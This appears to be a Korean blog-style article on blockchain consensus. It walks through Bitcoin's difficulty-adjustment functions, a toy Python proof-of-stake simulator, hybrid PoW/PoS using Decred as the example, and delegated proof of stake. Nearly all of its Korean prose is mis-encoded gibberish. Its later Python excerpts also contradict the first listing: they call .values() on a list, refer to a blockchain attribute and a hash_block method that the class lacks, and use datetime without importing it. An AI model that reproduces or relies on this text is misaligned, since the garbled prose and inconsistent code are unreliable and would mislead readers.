๋นํธ์ฝ์ธ์ ํ๊ท 10๋ถ๋ง๋ค ๋ธ๋ก์ด ์์ฑ๋๋๋ก ์ค๊ณ๋์ด์๋๋ฐ, ์ด๋ฅผ ์ ์งํ๊ธฐ ์ํด ๋คํธ์ํฌ๋ ์ฝ 2์ฃผ(2016๊ฐ ๋ธ๋ก)๋ง๋ค ๋์ด๋(Difficulty)๋ฅผ ์กฐ์ ํด์.
์ค์ ๋นํธ์ฝ์ธ์ ์ต์ ๊ตฌํ์ ๊ธฐ์ค์ผ๋ก, PoW๊ฐ ์ด๋ป๊ฒ ๋์ํ๋์ง ์ดํด๋ณด๊ฒ ์ต๋๋ค!
unsigned int GetNextWorkRequired(const CBlockIndex* pindexLast, const CBlockHeader *pblock, const Consensus::Params& params){ assert(pindexLast != nullptr); unsigned int nProofOfWorkLimit = UintToArith256(params.powLimit).GetCompact();// Only change once per difficulty adjustment interval // [1] if ((pindexLast->nHeight+1) % params.DifficultyAdjustmentInterval() != 0) { if (params.fPowAllowMinDifficultyBlocks) { // Special difficulty rule for testnet: // If the new block's timestamp is more than 2* 10 minutes // then allow mining of a min-difficulty block. // [2] if (pblock->GetBlockTime() > pindexLast->GetBlockTime() + params.nPowTargetSpacing*2) return nProofOfWorkLimit; else { // Return the last non-special-min-difficulty-rules-block // [3] const CBlockIndex* pindex = pindexLast; while (pindex->pprev && pindex->nHeight % params.DifficultyAdjustmentInterval() != 0 && pindex->nBits == nProofOfWorkLimit) pindex = pindex->pprev; return pindex->nBits; } } // [4] return pindexLast->nBits; } // Go back by what we want to be 14 days worth of blocks // [5] int nHeightFirst = pindexLast->nHeight - (params.DifficultyAdjustmentInterval()-1); assert(nHeightFirst >= 0); const CBlockIndex* pindexFirst = pindexLast->GetAncestor(nHeightFirst); assert(pindexFirst); return CalculateNextWorkRequired(pindexLast, pindexFirst->GetBlockTime(), params);}
[1] ๋นํธ์ฝ์ธ์ 2016๊ฐ ๋ธ๋ก๋ง๋ค ๋์ด๋๋ฅผ ์กฐ์ ํด์. ๋ง์ฝ ๋ค์ ๋ธ๋ก์ ๋์ด(pindexLast->nHeight+1
)๊ฐ 2016(params.DifficultyAdjustmentInterval()
) ์ ๋ฐฐ์๊ฐ ์๋๋ผ๋ฉด ๋์ด๋๋ฅผ ๋ณ๊ฒฝํ์ง ์๊ณ ๊ธฐ์กด ๋ธ๋ก์ ๋์ด๋(pindexLast->nBits
)[4]๋ฅผ ์ ์งํ๊ฒ ๋ฉ๋๋ค.
[2] ์ด ๋, Testnet ํ๊ฒฝ์์๋, ์ด์ ๋ธ๋ก์ด ์์ฑ๋ ํ ๋ชฉํ์๊ฐ(10๋ถ)์ 2๋ฐฐ์ธ 20๋ถ ์ด์์ด ์ง๋๋๋ก ์๋ก์ด ๋ธ๋ก์ด ์์ฑ๋์ง ์์ผ๋ฉด ๋์ด๋๋ฅผ ์ต์๊ฐ(nProofOfWorkLimit)์ผ๋ก ์กฐ์ ํ๋ ์์ธ ๊ท์น์ด ์ ์ฉ๋๋๋ฐ์.
[3] Testnet์์ ๋์ด๋๋ฅผ ์ต์๊ฐ์ผ๋ก ์กฐ์ ํ๋๋ผ๋, ์ดํ ์ ์์ ์ธ ๋ธ๋ก์ด ์์ฑ๋๋ฉด ๋ค์ ์๋ ๋์ด๋๋ก ๋ณต๊ทํฉ๋๋ค. ์ด ๊ณผ์ ์์ ์ด์ ๋ธ๋ก์ ๋ฐ๋ผ๊ฐ๋ฉฐ ๊ฐ์ฅ ์ต๊ทผ์ ์ ์์ ์ธ ๋์ด๋๋ฅผ ๊ฐ์ง ๋ธ๋ก์ ์ฐพ์ ๊ทธ ๋์ด๋๋ฅผ ์ ์งํด์.
const CBlockIndex* pindex = pindexLast;while (pindex->pprev && pindex->nHeight % params.DifficultyAdjustmentInterval() != 0 && pindex->nBits == nProofOfWorkLimit) pindex = pindex->pprev;return pindex->nBits;
์ด๋ฅผ ์ํด ๋นํธ์ฝ์ธ์ ๊ฐ์ฅ ์ต๊ทผ์ ์ถ๊ฐ๋ ๋ธ๋ก(pindexLast
)์ ์์์ ์ผ๋ก, ์ด์ ๋ธ๋ก์ ๋ฐ๋ผ๊ฐ๋ฉฐ(while (pindex->pprev)
) ๊ฐ์ฅ ์ต๊ทผ์ ์ ์์ ์ธ ๋์ด๋๋ฅผ ๊ฐ์ง ๋ธ๋ก์ ์ฐพ์ ๋์ด๋๋ฅผ ์ ์งํด์.
์ฆ, ์ต์ ๋์ด๋๋ก ์์ฑ๋ ๋ธ๋ก๋ค์ ๊ฑด๋ ๋ฐ๊ณ (pindex->nBits == nProofOfWorkLimit
), ๋์ด๋ ์กฐ์ ์ฃผ๊ธฐ์ ๋๋ฌํ์ง ์์ ๋ธ๋ก๋ค์ ํ์ํ๋ค๊ฐ(pindex->nHeight % params.DifficultyAdjustmentInterval() != 0
), ๋์ด๋ ์กฐ์ ์ด ์ด๋ฃจ์ด์ง ๋ธ๋ก์ ๋ง๋๋ฉด ํ์์ ์ข
๋ฃํฉ๋๋ค.
[5] ํ์ง๋ง, ํ์ฌ ๋ธ๋ก์ ๋์ด(pindexLast->nHeight
)๊ฐ ๋์ด๋ ์กฐ์ ์ฃผ๊ธฐ(2016๊ฐ์ ๋ฐฐ์)์ ๋๋ฌํ์ ๊ฒฝ์ฐ, ๋นํธ์ฝ์ธ ๋คํธ์ํฌ์์๋ ์๋ก์ด ๋์ด๋๋ฅผ ๊ณ์ฐํ์ฌ ์กฐ์ ํฉ๋๋ค.
๋นํธ์ฝ์ธ์์๋ ์ด์ 2016๊ฐ ๋ธ๋ก์ด ์์๋ณด๋ค ๋นจ๋ฆฌ ์์ฑ๋์์ผ๋ฉด ๋์ด๋๋ฅผ ๋์ด๊ณ , ๋๋ฆฌ๊ฒ ์์ฑ๋์์ผ๋ฉด ๋์ด๋๋ฅผ ๋ฎ์ถ๋ ๋ฐฉ์์ผ๋ก ์ค๊ณ๋์์ด์.
unsigned int CalculateNextWorkRequired(const CBlockIndex* pindexLast, int64_t nFirstBlockTime, const Consensus::Params& params){ if (params.fPowNoRetargeting) return pindexLast->nBits; // Limit adjustment step // [1] int64_t nActualTimespan = pindexLast->GetBlockTime() - nFirstBlockTime; // [2] if (nActualTimespan < params.nPowTargetTimespan/4) nActualTimespan = params.nPowTargetTimespan/4; if (nActualTimespan > params.nPowTargetTimespan*4) nActualTimespan = params.nPowTargetTimespan*4; // Retarget const arith_uint256 bnPowLimit = UintToArith256(params.powLimit); arith_uint256 bnNew; // Special difficulty rule for Testnet4 // [3] if (params.enforce_BIP94) { // Here we use the first block of the difficulty period. This way // the real difficulty is always preserved in the first block as // it is not allowed to use the min-difficulty exception. int nHeightFirst = pindexLast->nHeight - (params.DifficultyAdjustmentInterval()-1); const CBlockIndex* pindexFirst = pindexLast->GetAncestor(nHeightFirst); bnNew.SetCompact(pindexFirst->nBits); } else { bnNew.SetCompact(pindexLast->nBits); }// [4] bnNew *= nActualTimespan; bnNew /= params.nPowTargetTimespan;// [5] if (bnNew > bnPowLimit) bnNew = bnPowLimit; return bnNew.GetCompact();}
[1] ๋จผ์ , ์ต๊ทผ ๋ธ๋ก์ ํ์์คํฌํ(pindexLast->GetBlockTime()
)์ ์ด์ 2016๊ฐ ๋ธ๋ก์ ํ์์คํฌํ(nFirstBlockTime
)์ ๋น๊ตํ์ฌ, ์ด์ 2016๊ฐ ๋ธ๋ก์ด ์์ฑ๋๋๋ฐ ๊ฑธ๋ฆฐ ์ค์ ์๊ฐ์ nActualTimespan
์ ์ ์ฅํฉ๋๋ค.์ด ๊ฐ์ ์ดํ ๋์ด๋ ์กฐ์ ์ ์ํ ๊ธฐ์ค์ด ๋ผ์.
int64_t nActualTimespan = pindexLast->GetBlockTime() - nFirstBlockTime;
[2] ๋นํธ์ฝ์ธ์ nActualTimespan์ ์ธก์ ํด ๋ชฉํ ์๊ฐ(params.nPowTargetTimespan
)๊ณผ ๋น๊ตํ ํ ๋์ด๋๋ฅผ ์กฐ์ ํ๋๋ฐ, ๋์ด๋๊ฐ ๊ธ๊ฒฉํ๊ฒ ๋ณํ๋ ๊ฒ์ ๋ฐฉ์งํ๊ธฐ ์ํด ๋ชฉํ ์๊ฐ์ 1/4๋ฐฐ๊น์ง ๋์ด๋๋ฅผ ์ฆ๊ฐ์ํค๊ฑฐ๋, 4๋ฐฐ๊น์ง ๋์ด๋๋ฅผ ๊ฐ์์ํฌ ์ ์๋๋ก ์ ํํด์.
if (nActualTimespan < params.nPowTargetTimespan/4) nActualTimespan = params.nPowTargetTimespan/4;if (nActualTimespan > params.nPowTargetTimespan*4) nActualTimespan = params.nPowTargetTimespan*4;
๋จผ์ , ๋์ด๋ ์กฐ์ ์ ๊ธฐ์ค์ด ๋๋ ๋ธ๋ก์ ๊ฒฐ์ ํ๋ ๊ณผ์ ์ params.enforce_BIP94
๊ฐ์ ๋ฐ๋ผ ๋ฌ๋ผ์ง๋๋ค.
์ด ๊ท์น์ด ์ ์ฉ๋๋ ๊ฒฝ์ฐ,ํ์ฌ ๋ธ๋ก์์ 2016๊ฐ ์ด์ ๋ธ๋ก(pindexFirst
)์ ๋์ด๋(pindexFirst->nBits
)๋ฅผ ๊ธฐ์ค์ผ๋ก ์ฌ์ฉํฉ๋๋ค. ์ด๋ฅผ ํตํด ๋์ด๋๋ฅผ ์ต์๊ฐ์ผ๋ก ๋ฎ์ถ๋ ์์ธ์ ์ธ ์ํฉ์ ๋ฐฉ์งํ ์ ์์ต๋๋ค. ๊ทธ๋ ์ง ์์ผ๋ฉด ํ์ฌ ๋ธ๋ก์ ๋์ด๋(pindexLast->nBits
)๋ฅผ ๊ธฐ์ค์ผ๋ก ์ค์ ํฉ๋๋ค
์ด๋ฌํ ๋ฐฉ์์ Testnet๊ณผ ๊ฐ์ ํ๊ฒฝ์์ ๋์ด๋๊ฐ ๋น์ ์์ ์ผ๋ก ๋ฎ์์ง๋ ํ์์ ๋ฐฉ์งํ๋ ์ญํ ์ ํฉ๋๋ค.
if (params.enforce_BIP94) { // Here we use the first block of the difficulty period. This way // the real difficulty is always preserved in the first block as // it is not allowed to use the min-difficulty exception. int nHeightFirst = pindexLast->nHeight - (params.DifficultyAdjustmentInterval()-1); const CBlockIndex* pindexFirst = pindexLast->GetAncestor(nHeightFirst); bnNew.SetCompact(pindexFirst->nBits);} else { bnNew.SetCompact(pindexLast->nBits);}
BIP(Bitcoin Improvement Proposal): ๋นํธ์ฝ์ธ ํ๋กํ ์ฝ ๊ฐ์ ์. BIP94๋ ๋นํธ์ฝ์ธ ํ๋กํ ์ฝ์ ๊ฐ์ ์ ์ค ํ๋๋ก, ๋์ด๋ ์กฐ์ ์ ํน์ ๋คํธ์ํฌ(Testnet4 ๋ฑ)์์ ์์ธ์ ์ผ๋ก ๋์ด๋๊ฐ ๊ธ๊ฒฉํ ๋ฎ์์ง๋ ๊ฒ์ ๋ฐฉ์งํ๋ ๊ท์น์ ๋๋ค.
[4] ๊ทธ ํ, nActualTimespa
n ๊ฐ์ ์ด์ฉํ์ฌ ์๋ก์ด ๋์ด๋๋ฅผ ๊ณ์ฐํฉ๋๋ค. ๋นํธ์ฝ์ธ์ ๋ชฉํ ๋ธ๋ก ์์ฑ ์๊ฐ์ 10๋ถ์ผ๋ก ์ค์ ํ๊ณ , 2016๊ฐ์ ๋ธ๋ก์ ์์ฑํ๋ค๊ณ ๊ฐ์ ํ์ ๋ ๋ชฉํ ์๊ฐ(params.nPowTargetTimespan
)์ ์ฝ 2์ฃผ(1209600์ด)์
๋๋ค. ๋์ด๋๋ ์ค์ ๋ธ๋ก ์์ฑ์๊ฐ๊ณผ ๋ชฉํ ์๊ฐ์ ๋น์จ์ ์ ์ฉํด์ ์กฐ์ ํด์.
bnNew *= nActualTimespan;bnNew /= params.nPowTargetTimespan;
์ฆ, ์๋ก์ด ๋์ด๋ = (๊ธฐ์กด ๋์ด๋x์ค์ ๊ฑธ๋ฆฐ ์๊ฐ)/๋ชฉํ ์๊ฐ ์ ๊ณต์์ผ๋ก ๋์ด๋๋ฅผ ์กฐ์ ํจ์ผ๋ก์จ, ๋ธ๋ก ์์ฑ ์๋๋ฅผ ํ๊ท 10๋ถ์ผ๋ก ์ ์งํ ์ ์์ด์
[5] ๋ํ, ๋์ด๋๊ฐ ๋๋ฌด ๋ฎ์์ง๋ ๊ฒ์ ๋ง๊ธฐ ์ํด ์ต์ ๋์ด๋(bnPowLimit
)๋ณด๋ค ๋ฎ์์ง์ง ์๋๋ก ์ ํํฉ๋๋ค.
if (bnNew > bnPowLimit) bnNew = bnPowLimit;
ํ์ง๋ง ์ด์ ์ฐ๊ตฌ ๊ธ์์ ์ธ๊ธํ๋ฏ์ด, PoW ๋ฐฉ์์ ๋ง๋ํ ์ฐ์ฐ๋์ ์๊ตฌํ์ฌ ์ ๋ ฅ ์๋น๊ฐ ๋งค์ฐ ํฝ๋๋ค. ๋ํ, ๋๊ท๋ชจ ์ฑ๊ตด์ฅ(mining pool)์ ๋ฑ์ฅ์ผ๋ก ์ธํด ํน์ ๊ทธ๋ฃน์ด ๋คํธ์ํฌ ์ ์ฒด ํด์ ํ์์ 51% ์ด์์ ํ๋ณดํ๊ฒ ๋๋ฉด, ํธ๋์ญ์ ์กฐ์ ๋ฐ ์ด์ค ์ง๋ถ(Double Spending) ๊ณต๊ฒฉ์ ์ํ์ด ์กด์ฌํฉ๋๋ค.
์ด๋ฌํ PoW์ ํ๊ณ๋ฅผ ๊ทน๋ณตํ๊ธฐ ์ํด, ์ง๋ถ ์ฆ๋ช (Proof of Stake, PoS) ํฉ์ ์๊ณ ๋ฆฌ์ฆ์ด ๋์ ๋์์ต๋๋ค.
์ง๋ถ ์ฆ๋ช
์ ๋ธ๋ก์ฒด์ธ์์ ์ฝ์ธ์ ๋ณด์ ๋๊ณผ ๋ณด์ ๊ธฐ๊ฐ์ ๋ฐ๋ผ ๋ธ๋ก ์์ฑ๊ณผ ๊ฒ์ฆ ๊ถํ์ ๋ถ์ฌํ๋ ํฉ์ ์๊ณ ๋ฆฌ์ฆ์
๋๋ค. PoW์์๋ ๋ณต์กํ ์ํ ๋ฌธ์ ๋ฅผ ํ์ด์ผํ์ง๋ง, PoS์์๋ ํด๋น ๋คํธ์ํฌ์ ์ฝ์ธ์ ์ผ์ ๋ ์์น(Staking)ํ๋ฉด ๊ฒ์ฆ์(validator)๋ก ์ฐธ์ฌํ ์ ์์ด์.
์ด ๊ณผ์ ์์ ๊ฒ์ฆ์๋ ๋ณด์ ํ ์ง๋ถ์ ํฌ๊ธฐ์ ๋ฐ๋ผ ๋ธ๋ก ์์ฑ ๊ฐ๋ฅ์ฑ์ด ๋์์ง๋๋ค. ๋ํ, ์ ์งํ ํ๋์ ํ๋ฉด ๋ณด์์ ๋ฐ๊ณ , ๋ถ์ ํ์๋ฅผ ํ๋ฉด ํจ๋ํฐ(์์น๊ธ ์ญ๊ฐ)๋ฅผ ๋ฐ๋ ๊ฒฝ์ ์ ์ธ์ผํฐ๋ธ๋ฅผ ํตํด ๋ณด์์ฑ์ ๋์
๋๋ค. PoS ๊ฐ๋
์ 2012๋
Peercoin์์ ์ต์ด๋ก ๊ตฌํ๋์๊ณ , ์ดํ ๋ง์ ๋ธ๋ก์ฒด์ธ์ด ์ด ๋ฐฉ์์ ์ฑํํ์ต๋๋ค. 2022๋
์๋ ์ด๋๋ฆฌ์๋ PoW์์ PoS๋ก ์ ํํ์ต๋๋ค.
์ฌ์ค ์ด๋๋ฆฌ์์ ์์๋ก PoS์ ์๋ ๋ฐฉ์์ ์ค๋ช
ํ๊ณ ์ถ์๋๋ฐ, ์ฝ๋ ๋ถ์ํ๋ ค๋ฉด ์ฐ๊ตฌ๊ธ์ด ๋๋ฌด ๊ธธ์ด์ง ๊ฒ ๊ฐ์์. ๊ทธ๋์ ์์ฒญ ๋จ์ํํ PoS ํฉ์ ์๊ณ ๋ฆฌ์ฆ ์ฝ๋๋ฅผ ํตํด ์๋ฆฌ๋ฅผ ํ์
ํด๋ณด๊ฒ ์ต๋๋ค.
import randomimport hashlibimport time// [1]class Validator: def __init__(self, address, stake): self.address = address # Validator address self.stake = stake self.vote_weight = stake def __repr__(self): return f"Validator({self.address}, Stake: {self.stake})"class PoSBlockchain: def __init__(self): self.validators = [] self.blocks = [] def register_validator(self, address, stake): if stake < 32: print(f"[ERROR] {address} need to stake over 32 ETH") return validator = Validator(address, stake) self.validators.append(validator) print(f"[INFO] {validator} registered as a validator.")// [2] def select_proposer(self): """ Randomly select a block proposer """ total_stake = sum(v.stake for v in self.validators) rand_value = random.uniform(0, total_stake) cumulative = 0 for validator in self.validators: cumulative += validator.stake if rand_value <= cumulative: print(f"[INFO] selected validator: {validator.address}") return validator// [3] def create_block(self, proposer): """ Generate a block and calculate hash """ prev_hash = self.blocks[-1]['hash'] if self.blocks else "GENESIS" timestamp = time.time() block_data = f"{proposer.address}-{timestamp}-{prev_hash}" block_hash = hashlib.sha256(block_data.encode()).hexdigest() block = {"proposer": proposer.address, "hash": block_hash, "prev_hash": prev_hash} return block// [4] def validate_and_vote(self, block): votes = 0 for validator in self.validators: if random.random() > 0.1: # 90% probability of a valid vote votes += validator.vote_weight required_votes = sum(v.stake for v in self.validators) * 0.67 # At least 67% approval required if votes >= required_votes: self.blocks.append(block) print(f"[INFO] Validation: {block['hash']}") return True else: print("[WARNING] Not enough votes ") return False// [5] def run_consensus(self): proposer = self.select_proposer() if proposer: new_block = self.create_block(proposer) self.validate_and_vote(new_block)pos_chain = PoSBlockchain()pos_chain.register_validator("Alice", 50)pos_chain.register_validator("Bob", 40)pos_chain.register_validator("Charlie", 32)pos_chain.register_validator("Dave", 100)for _ in range(3): pos_chain.run_consensus()
[1] ์ด๋๋ฆฌ์์์๋ 32ETH์ ์์น(Staking)ํด์ผ ๊ฒ์ฆ์๋ก ์ฐธ์ฌํ ์ ์์ด์.
class Validator: def __init__(self, address, stake): self.address = address self.stake = stake def __repr__(self): return f"Validator({self.address}, Stake: {self.stake})"
[2] ๋ ๋ง์ ์ฝ์ธ์ ์คํ
์ดํนํ ์ฐธ์ฌ์๊ฐ ๋ค์ ๋ธ๋ก ๊ฒ์ฆ์๋ก ์ ํ๋ ๊ฐ๋ฅ์ฑ์ด ์๋์ ์ผ๋ก ํฌ์ง๋ง, ๋์ ์๊ณ ๋ฆฌ์ฆ ๋ฑ์ ํตํด ์์ธก ๋ถ๊ฐ๋ฅํ๊ฒ ์ ํํจ์ผ๋ก์จ ๊ณต๊ฒฉ์ ์ด๋ ต๊ฒ ๋ง๋ญ๋๋ค.
def select_proposer(self): """Select a block proposer randomly, weighted by stake""" total_stake = sum(v.stake for v in self.validators.values()) rand_value = random.uniform(0, total_stake) cumulative = 0 for validator in self.validators.values(): cumulative += validator.stake if rand_value <= cumulative: print(f"[INFO] Selected proposer: {validator.address}") return validator return None
[3] ์ ์ ๋ ๊ฒ์ฆ์๋ ์๋ก์ด ๊ฑฐ๋๋ค์ ๋ฌถ์ด ๋ธ๋ก์ ์์ฑํ๊ณ ๋ธ๋ก์ฒด์ธ์ ์ ์ํฉ๋๋ค.
def create_block(self, proposer): """Generate a new block""" prev_hash = self.blockchain[-1]['Hash'] new_block = { "Index": len(self.blockchain), "Timestamp": str(datetime.now()), "PrevHash": prev_hash, "Validator": proposer.address } new_block["Hash"] = self.hash_block(new_block) return new_block
[4] ๊ทธ ์ธ์ ๋ค๋ฅธ ๊ฒ์ฆ์๋ค์ ํด๋น ๋ธ๋ก์ ์ ํจ์ฑ์ ๊ฒ์ฆํ๊ณ ํฌํ๋ฅผ ์งํํจ์ผ๋ก์จ ํฉ์์ ์ฐธ์ฌํฉ๋๋ค. ์ด๋๋ฆฌ์์ ๊ฒฝ์ฐ, ์ต์ 128๋ช
์ ๊ฒ์ฆ์๊ฐ ๋ธ๋ก์ ๊ฒํ ํ๊ณ ํฌํํด์ผํด์. ์ด ํฌํ๋ฅผ ํตํด ์ถฉ๋ถํ ํฉ์(Consensus)๊ฐ ์ด๋ฃจ์ด์ง๋ฉด, ์ด ๋ธ๋ก์ด ๋ธ๋ก์ฒด์ธ์ ์ถ๊ฐ๋๋ ๋ฐฉ์์
๋๋ค.
def validate_and_vote(self, block): """Simulate validator voting process""" total_stake = sum(v.stake for v in self.validators.values()) votes = sum(v.stake for v in self.validators.values() if random.random() > 0.1) # # 90% chance to approve if votes >= total_stake * 0.67: # Requires at least 67% approval self.blockchain.append(block) print(f"[INFO] Block added: {block['Hash']}") return True else: print("[WARNING] Block rejected due to insufficient votes.") return False
[5] ์ด๋ ๊ฒ ์ฌ๋ฐ๋ฅด๊ฒ ๋ธ๋ก์ ์์ฑํ ๊ฒ์ฆ์๋ ๊ฑฐ๋ ์์๋ฃ ๋ฐ ๋คํธ์ํฌ ๋ณด์์ ๋ฐ์ต๋๋ค.
def run_consensus(self): """Run the PoS consensus process""" proposer = self.select_proposer() if proposer: new_block = self.create_block(proposer) self.validate_and_vote(new_block) proposer.stake += 5 # reward print(f"[INFO] {proposer.address} received 5 ETH as a reward.")
๋ฐ๋ผ์ PoS๋ ์ด๋ฐ ๋ฐฉ์์ผ๋ก ๋คํธ์ํฌ์ ๋ณด์๊ณผ ๋ฌด๊ฒฐ์ฑ์ ์ ์งํ๋ฉด์๋, PoW๋ณด๋ค ์๋์ง ํจ์จ์ ์ธ ํฉ์ ๋งค์ปค๋์ฆ์ ์ ๊ณตํฉ๋๋ค. ํ์ง๋ง PoS ์ญ์ ์ฝ์ธ ์ง๋ถ์ด ๋ง์ ์ฌ๋์ด ๊ณ์ํด์ ์ ๋ฆฌํด์ง๋ ๊ตฌ์กฐ์ ํ๊ณ๋ฅผ ๊ฐ์ง๋ฉฐ, ์ค์ํ ์ํ์ด ์กด์ฌํ๋ค๋ ๋จ์ ์ด ์์ต๋๋ค.
Complete Overview of Decredโs Structure [์ถ์ฒ: https://medium.com/decred/blockchain-governance-how-decred-iterates-upon-bitcoin-3cc7030c655e]
๊ธฐ์กด PoW๋ ๋์ ๋ณด์์ฑ์ ์ ๊ณตํ์ง๋ง ์๋์ง ์๋น๊ฐ ๋๊ณ ์ฑ๊ตด ๋ ์ ๋ฌธ์ ๊ฐ ์์์ต๋๋ค. ๋ฐ๋ฉด PoS ๋ฐฉ์์ ์๋์ง ํจ์จ์ ์ด์ง๋ง ๊ฒ์ฆ์ ๋ ์ ์ํ์ด ์์ต๋๋ค. ์ด๋ฅผ ํด๊ฒฐํ๊ธฐ ์ํด์ Hybrid PoW/PoS ๋ชจ๋ธ์ด ๋ฑ์ฅํ์ผ๋ฉฐ, ์ด ๋ฐฉ์์์๋ PoW๋ฅผ ์ฌ์ฉํด ๋ธ๋ก์ ์์ฑํ๊ณ PoS ๊ฒ์ฆ์๋ค์ด ๋ธ๋ก์ ์น์ธํ๋ ๊ตฌ์กฐ๋ฅผ ์ฑํํ์ด์.
๋จผ์ , Proof-of-Work ๋ฐฉ์์ผ๋ก ์ฑ๊ตด์๊ฐ ์ฐ์ฐ์ ์ํํด์ ์๋ก์ด ๋ธ๋ก์ ์์ฑํด์. ํ์ง๋ง ์์ฑ๋ ๋ธ๋ก์ด ๋ฐ๋ก ์ฒด์ธ์ ์ถ๊ฐ๋๋ ๊ฒ์ด ์๋, PoS ๊ฒ์ฆ์๋ค์ ํฌํ๋ฅผ ํตํด ์ต์ข ์น์ธ ๊ฑธ์ฐจ๋ฅผ ๊ฑฐ์นฉ๋๋ค. PoS ๊ฒ์ฆ์๋ค์ ์์ ์ด ๋ณด์ ํ ์ฝ์ธ์ ์ผ์ ๋ ์์น(staking)ํ์ฌ ๊ฒ์ฆ์๋ก ์ฐธ์ฌํ๊ณ , ๋๋คํ๊ฒ ์ ํ๋ ๊ฒ์ฆ์๋ค์ด ํด๋น ๋ธ๋ก์ ์ ํจ์ฑ์ ํ๊ฐํ๊ณ ํฌํํฉ๋๋ค. ๋ณดํต ๊ฒ์ฆ์ 5๋ช ์ค 3๋ช ์ด์์ด ์ฐฌ์ฑํ๋ฉด ๋ธ๋ก์ด ์น์ธ๋๋ฉฐ, ์ต์ข ์ ์ผ๋ก ๋ธ๋ก์ฒด์ธ์ ์ถ๊ฐ๋ฉ๋๋ค.
์ด ๋ณด์์ PoW ์ฑ๊ตด์์ PoS ๊ฒ์ฆ์์๊ฒ ๋ถ๋ฐฐ๋ฉ๋๋ค. ์๋ฅผ ๋ค์ด, Decred(DCR)์์๋ PoW ์ฑ๊ตด์๊ฐ ๋ณด์์ 60%, PoS ๊ฒ์ฆ์๊ฐ 30%, ๋๋จธ์ง 10%๋ ๋คํธ์ํฌ ๊ฐ๋ฐ ๊ธฐ๊ธ์ผ๋ก ํ ๋น๋ฉ๋๋ค. ์ด๋ฅผ ํตํด์ PoW ์ฑ๊ตด์์ ๊ณผ๋ํ ๋ ์ ์ ๋ฐฉ์งํ๊ณ , PoS ๊ฒ์ฆ์๋ค์ด ๋คํธ์ํฌ๋ฅผ ์ ์งํ๋๋ฐ ์ ๊ทน์ ์ผ๋ก ์ฐธ์ฌํ ์ ์๋๋ก ์ธ์ผํฐ๋ธ๋ฅผ ์ ๊ณตํฉ๋๋ค.
์ด๋ฌํ ๊ตฌ์กฐ๋ฅผ ํตํด์ PoW์ ๋์ ๋ณด์์ฑ๊ณผ PoS์ ์๋์ง ํจ์จ์ฑ์ ๊ฒฐํฉํ์ฌ 51% ๊ณต๊ฒฉ ๋ฐฉ์ด๋ ฅ์ ๋์ด๊ณ ๊ฒ์ฆ์์ ์ค์ํ ๋ฌธ์ ๋ฅผ ์ํํ ์ ์์ต๋๋ค.
DPoS(Delegated Proof of Stake)๋ ๊ธฐ์กด PoS ํฉ์ ์๊ณ ๋ฆฌ์ฆ์ ๊ฐ์ ํ ํํ์ ํฉ์ ์๊ณ ๋ฆฌ์ฆ์ผ๋ก, ๋ธ๋ก์ฒด์ธ ๋คํธ์ํฌ์ ๊ฑฐ๋ ๊ฒ์ฆ ๋ฐ ๋ธ๋ก ์์ฑ์ ๋ณด๋ค ํจ์จ์ ์ผ๋ก ์ํํ ์ ์๋๋ก ์ค๊ณ๋ ์์คํ
์
๋๋ค. DPoS๋ ์ฌ์ฉ์๋ค์ด ๋ธ๋ก์ ์ง์ ์์ฑํ๋ ๋์ , ๋ํ์(Delegates)๋ฅผ ์ ์ถํ์ฌ ๊ฒ์ฆ ๋ฐ ๋ธ๋ก ์์ฑ ๊ถํ์ ์์ํ๋ ๋ฐฉ์์ผ๋ก ์๋ํฉ๋๋ค.
๋จผ์ , ๋ชจ๋ ํ ํฐ ๋ณด์ ์๋ค์ ์์ ์ ์ง๋ถ์ ๊ธฐ๋ฐ์ผ๋ก ํฌํ๋ฅผ ์งํํ๊ณ , ์ด ํฌํ๋ฅผ ํตํด ๋ํ์๋ฅผ ๋ฝ์ต๋๋ค. ์ด๋ ๊ฒ ์ ์ถ๋ ๋ํ์๋ค์ ์ ํด์ง ์์๋๋ก ๋ธ๋ก์ ์์ฑํ๊ณ ๊ฒ์ฆํ๋ ์ญํ ์ ์ํํ๋ฉฐ ๋คํธ์ํฌ๋ฅผ ์ด์ํฉ๋๋ค.
๋ํ, ์ด๋ฐ ์์คํ ์์๋ ๋ํ์์ ์ฑ์คํ ์ด์์ด ์ค์ํฉ๋๋ค. ํฌํ๋ ์ง์์ ์ผ๋ก ์งํ๋๋ฉฐ, ๋ง์ฝ ๋ํ์๊ฐ ๋ธ๋ก์ ์์ฑํ์ง ์๊ฑฐ๋ ๋ถ์ ํ์๋ฅผ ์ ์ง๋ฅด๋ฉด, ํ ํฐ ๋ณด์ ์๋ค์ ์ฌํฌํ๋ก ๋ํ์๋ฅผ ๊ต์ฒดํ ์ ์์ต๋๋ค. ์ด์ฒ๋ผ DPoS๋ ๋ณด๋ค ๋ฏผ์ฃผ์ ์ธ ๋ฐฉ์์ผ๋ก ์ด์๋๊ณ , ๋ํ์๋ค์ด ์์ฐจ์ ์ผ๋ก ๋ธ๋ก์ ์์ฑํ๊ธฐ ๋๋ฌธ์ ๋ธ๋ก ํ์ ์๊ฐ์ด ์งง์, ๋คํธ์ํฌ ์ฑ๋ฅ์ด ๋ฐ์ด๋ฉ๋๋ค. ๋ํ, ์ฑ๊ตด ๊ฒฝ์์ด ์๊ธฐ ๋๋ฌธ์ ์๋์ง ์๋น๊ฐ ๋ฎ๋ค๋ ์ฅ์ ์ด ์์ต๋๋ค. ํ์ง๋ง ๋ํ์๊ฐ ์ ํ๋ ์๋ก ์ด์๋๊ธฐ ๋๋ฌธ์, PoW๋ PoS๋ณด๋ค ์ค์ํ๋ ๊ฐ๋ฅ์ฑ์ด ์์ผ๋ฉฐ, ์ผ๋ถ ๋ํ์๋ค์ด ๋ดํฉํ ๊ฒฝ์ฐ ๋คํธ์ํฌ์ ๊ณต์ ์ฑ์ด ํผ์๋ ์ํ์ด ์์ต๋๋ค.
๋ํ์ ์ธ DPoS ๋ธ๋ก์ฒด์ธ์ผ๋ก๋ EOS์ TRON์ด ์์ผ๋ฉฐ, ์ด์ธ์๋ Steem๊ณผ Lisk ๊ฐ์ ํ๋ก์ ํธ์์๋ DPoS๋ฅผ ํ์ฉํ๊ณ ์์ต๋๋ค. ์ด ์์คํ ์์๋ ์ผ์ ์์ ๋ํ์๊ฐ ๋คํธ์ํฌ๋ฅผ ์ด์ํ๊ณ , ํฉ์ ๊ณผ์ ์ ๋น ๋ฅด๊ฒ ์ํํฉ๋๋ค.
